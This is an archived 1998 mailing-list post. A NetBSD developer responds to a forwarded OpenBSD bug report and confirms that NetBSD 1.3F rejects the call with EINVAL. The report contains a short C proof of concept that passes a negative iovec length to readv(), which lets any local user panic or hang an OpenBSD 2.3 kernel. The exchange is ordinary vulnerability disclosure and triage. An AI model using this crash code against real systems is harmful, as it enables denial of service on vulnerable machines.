On Mon, 27 Jul 1998 11:23:59 -0600
Michael Fuhr <mfuhrat_private> wrote:

To see if this is a generic *BSD bug, I checked a NetBSD-current (1.3F)
machine. NetBSD 1.3F is NOT vulnerable; the readv() returns EINVAL.

I performed the NetBSD test on both a PPro (i386) and Shark (arm32).

> -----Forwarded message from jonat_private-----
>
> Message-Id: <199807271126.MAA16724at_private>
> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
> From: jonat_private
> To: gnatsat_private
> X-Send-Pr-Version: 3.97
> Subject: kernel/549: Any user can panic OpenBSD machine
> Sender: owner-bugsat_private
>
>
> >Number: 549
> >Category: kernel
> >Synopsis: readv with -ve block size panics kernel
> >Confidential: yes
> >Severity: critical
> >Priority: high
> >Responsible: bugs
> >State: open
> >Class: sw-bug
> >Submitter-Id: net
> >Arrival-Date: Mon Jul 27 05:40:02 MDT 1998
> >Last-Modified:
> >Originator: Jon Ribbens
> >Organization:
> \/ Jon Ribbens / jonat_private
> >Release: 2.3
> >Environment:
>
> System : OpenBSD 2.3
> Architecture: OpenBSD.i386
> Machine : i386
> >Description:
> readv with one of the blocks having a -ve size panics the kernel.
> Oops.
>
> >How-To-Repeat:
>
> #include <sys/types.h>
> #include <sys/uio.h>
> #include <unistd.h>
>
> int main(void) {
>   struct iovec iov[1];
>   char buffer[1024];
>
>   iov[0].iov_base = buffer;
>   iov[0].iov_len = -1;
>
>   return readv(0, iov, 1);
> }
>
> run the above program, type a few characters, press return, observe
> either kernel panic or machine hang. panic message is
> "panic: ureadc: non-positive resid". Any user can do this.
>
>
> >Fix:
> Dunno I'm afraid.
>
>
> >Audit-Trail:
> >Unformatted:
>
> -----End of forwarded message-----
>
> --
> Michael Fuhr
> http://www.fuhr.net/~mfuhr/

Jason R. Thorpe                              thorpejat_private
NASA Ames Research Center                    Home: +1 408 866 1912
NAS: M/S 258-5                               Work: +1 650 604 0935
Moffett Field, CA 94035                      Pager: +1 650 940 5942
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:08:26 PDT